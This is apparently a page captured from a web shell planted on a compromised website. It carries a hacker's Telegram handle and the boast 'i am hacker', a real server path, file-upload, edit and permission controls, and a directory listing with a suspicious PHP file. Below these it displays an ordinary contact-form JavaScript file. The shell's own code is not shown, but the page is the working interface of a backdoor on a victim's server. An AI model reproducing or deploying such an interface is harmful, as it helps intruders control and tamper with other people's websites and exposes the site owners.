telegram : @iamdarkcomedy i am hacker

path :/home2/rdpgqqmy/public_html/techperformanceusa/public

upload file:

List of files:

name file size edit permission action
.htaccess906 KBJanuary 18 2024 20:05:520444
css-February 22 2025 03:07:500755
dashboard-February 21 2025 20:05:510755
error_log51354 KBFebruary 27 2025 15:17:580644
favicon.ico0 KBOctober 18 2021 11:56:120644
frontend-February 21 2025 20:05:510755
index.php6518 KBFebruary 21 2025 20:04:340444
index0.php1790 KBOctober 18 2021 11:56:120644
js-February 22 2025 03:23:490755
lass.php16962 KBFebruary 21 2025 20:04:340644
mix-manifest.json72 KBOctober 18 2021 17:53:080644
storage-February 22 2025 03:23:280755
uploads-February 22 2025 03:24:050755
web.config1211 KBOctober 18 2021 11:56:120644
/*==============================================================*/ // Contact Form JS /*==============================================================*/ (function ($) { "use strict"; // Start of use strict $("#contactForm").validator().on("submit", function (event) { if (event.isDefaultPrevented()) { // handle the invalid form... formError(); submitMSG(false, "Did you fill in the form properly?"); } else { // everything looks good! event.preventDefault(); submitForm(); } }); function submitForm(){ // Initiate Variables With Form Content var name = $("#name").val(); var email = $("#email").val(); var phone_number = $("#phone_number").val(); var message = $("#message").val(); $.ajax({ type: "POST", url: "assets/php/form-process.php", data: "name=" + name + "&email=" + email + "&phone_number=" + phone_number + "&message=" + message, success : function(text){ if (text == "success"){ formSuccess(); } else { formError(); submitMSG(false,text); } } }); } function formSuccess(){ $("#contactForm")[0].reset(); submitMSG(true, "Message Submitted!") } function formError(){ $("#contactForm").removeClass().addClass('shake animated').one('webkitAnimationEnd mozAnimationEnd MSAnimationEnd oanimationend animationend', function(){ $(this).removeClass(); }); } function submitMSG(valid, msg){ if(valid){ var msgClasses = "h4 text-left tada animated text-success"; } else { var msgClasses = "h4 text-left text-danger"; } $("#msgSubmit").removeClass().addClass(msgClasses).text(msg); } }(jQuery)); // End of use strict